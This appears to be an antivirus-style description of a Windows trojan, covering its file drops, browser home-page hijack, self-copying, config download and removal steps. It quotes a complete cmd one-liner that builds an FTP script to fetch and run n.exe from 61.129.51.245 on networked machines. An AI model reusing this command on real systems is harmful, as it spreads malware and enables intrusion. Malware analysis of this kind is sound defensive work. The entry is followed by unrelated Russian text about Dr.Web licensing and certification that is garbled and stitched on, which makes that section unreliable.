A trojan program that installs and launches other software on the infected computer without the user's knowledge. It is a Windows application (PE EXE-file). 25169 bytes. The program is packed by an unknown packer. Its unpacked size is around 74 kB. Written in C++.
Payload
If the path to the trojan file does not contain a sequence of "ommon" symbols, the trojan will retrieve a script from its body and will launch this script under the following name:
<rnd> is a sequence of three Latin symbols, for example, "YSQ".
This file is 803 bytes and is detected by Kaspersky Antivirus as Trojan.VBS.StartPage.hw.
The launch of this trojan script leads to a change in the default home page and search page for the Internet Explorer browser by adding the following information to the system registry key:
The trojan then creates a copy of its file under the name "coiome.exe" and deletes its original file:
%ProgramFiles%\Common Files\sebsbvx\coiome.exe
The file also has its creation date set as "17.08.2009", and the directory in which the trojan copy is found is given the attributes "hidden" and "system":
%ProgramFiles%\Common Files\sebsbvx
When creating a copy of itself, the trojan may add a random sequence of symbols to the file so that the trojan copy hash files vary. The trojan may also add a sequence of "2" symbols to the file, thus increasing the size of its copy.
The trojan then launches its copy and shuts down.
The trojan downloads the file from the following URL:
http://j.q***800.com/b.jpg
and saves the downloaded file under the following name:
%WinDir%\Fonts\oh.ini
This file is a configuration file and is used further by the trojan.
Using the system file:
%System%\sc.exe
it automatically launches services with the following names:
The trojan retrieves the following file from its body:
%WinDir%\Tasks\<rnd2>i.vbe
<rnd2> is a sequence of 3random Latin symbols.
This file is 2117 bytes. The file is a subsidiary and is used for the trojan's further work.
It then removes the following file from its body:
%WinDir%\Tasks\<rnd3>e.exe
<rnd3> is a sequence of 3 random Latin letters, for example, "DNP".
This file is detected by Kaspersky Antivirus as Exploit.Win32.IMG-WMF.fk.
In the extracted file, it enters the working time of the user's computer so that the hash files vary each time they are created. The trojan may also add a sequence of the "0" value to the file so that the file may be differentiated in size from 3748 bytes.
The trojan determines the IP-address of the user's computer and then reads and deciphers the previously retrieved configuration file named:
%WinDir%\Fonts\oh.ini
the trojan obtains one of the following parameters from this file which it will use to launch the file:
<parameter1> - IP-address (the trojan lists the IP-addresses of the local network where the infected computer is located)
<parameter2> - deciphered URL, received from the configuration file.
The configuration file contained the following link when creating the description:
http://dh***88.org/p/mi.exe (32891 bytes, detected by Kaspersky Antivirus as Trojan-Downloader.Win32.Geral.adeh)
It then runs the following type of command:
%System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-address of the attacked computer> administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
The trojan therefore tries to download and launch a file from the FTP-server named "n.exe" on the attacked computer. After a successful launch, it deletes this file.
It deletes the file before shutting down:
%ProgramFiles%\<rnd2>.hta
Removal instructions
If your computer has not been protected with anti-virus software and has been infected with malware, you will need to take the following actions to delete this:
Delete the original trojan file (its location on the infected computer will depend on how the program got onto the computer).
Using Task manager, end the trojan process:
coiome.exe
С 1 апреля текущего годы «Доктор Веб» обновляет цена лицензий на употребление ряда программных продуктов Dr.Web для индивидуального употребления эдак как для бизнеса эдак как госучреждений. помимо того, вводятся некие перемены в правилах лицензирования.
Так, будут повышены цены на Dr.Web Security Space для обороны 1... Антивирус Dr.Web
22 марта 2024 года
Комплексное решение для обороны любых объектов корпоративной сети, испытания почтового так что интернет-трафиков Dr.Web Enterprise Security Suite прошло инспекционный контроль ФСТЭК России.
Успешное прохождение испытаний доказано сертификатом соответствия №3509, реальным перед началом 27 января 2029 года.
«Доктор Веб» информирует о масштабном обновлении продуктов Dr.Web 12.0 так что 13.0 с централизованным управлением для бизнеса, а уж а а также продукта для обороны АСУ ТП Dr.Web Industrial.Теперь системным админам доступны новейшие способности управления системой защиты, в то период как-либо выявленные ошибки были исправлены.... Антивирус Dr.Web